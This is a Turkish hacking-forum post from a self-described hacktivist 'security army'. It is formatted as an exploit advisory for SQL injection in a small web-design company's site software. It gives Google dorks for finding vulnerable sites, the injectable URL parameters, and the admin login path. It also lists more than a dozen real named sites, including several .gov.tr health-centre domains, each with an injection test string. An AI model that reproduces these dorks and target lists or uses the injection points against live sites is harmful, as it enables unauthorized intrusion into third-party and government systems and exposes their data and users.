Konuyu Oyla:
  • Toplam: 2 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: BirWebMaster AsmWebSitesi Graphics Web Design SQL Inj
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,382 / 1,382
Deneyim: 30 / 100
Rep Sayısı: 2826
Mesaj Sayısı: 6456
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
BirWebMaster AsmWebSitesi Graphics Web Design SQL Inj
30.06.2018 16:13
################################################################################​#################

# Exploit Title : BirWebMaster AsmWebSitesi Graphics Web Design Services SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/06/2018
# Vendor Homepage : asmwebsitesi.net ~ birwebmaster.net
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dorks :

inurl:''/index.php?sayfa=DuyuruOku''

intext:''Asmwebsitesi.net Asm Web Sitesi''

intext:''BirWebMaster Web Tasarım Hizmetleri''

# Exploits :

/index.php?sayfa=DuyuruOku&id=[SQL Inj]

/index.php?sayfa=SayfaOku&SayfaId=[SQL Inj]

/index.php?sayfa=Galeri&islem=ResimGoster&id=[ID-NUMBER]&page=[SQL Inj]

# Admin Login Panel Path : /admin/index.php

################################################################################​#################

# Example Vulnerable SQL Sites =>

bestelsizasm.com/index.php?sayfa=DuyuruOku&id=2%27
tekkirazasm.com/index.php?sayfa=DuyuruOku&id=2%27
sabanozuasm.com/index.php?sayfa=DuyuruOku&id=2%27
sahinciliasm.com/index.php?sayfa=DuyuruOku&id=3%27
musguzeltepeasm.com/index.php?sayfa=DuyuruOku&id=11%27
kitreliasm.com/index.php?sayfa=DuyuruOku&id=12%27
cumhuriyetasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
emirefendiasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
mervesehirasm.gov.tr/index.php?sayfa=DuyuruOku&id=1%27
idil1noluasm.com/index.php?sayfa=DuyuruOku&id=7%27
ercis5noluasm.com/index.php?sayfa=DuyuruOku&id=1%27
hasancikasm.com/index.php?sayfa=DuyuruOku&id=2%27
islamdagasm.com/index.php?sayfa=DuyuruOku&id=13%27
tokiavrupaasm.com/index.php?sayfa=DuyuruOku&id=2%27

[ Proof of Concept for SQL Inj ] => archive.is/Jvfcu

# SQL Database Error =>

Warning: session_start(): Cannot send session cache limiter - headers already sent
(output started at /home/cumasm/public_html/index.php:1) in /home/cumasm/public_html/db.php on line 7

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi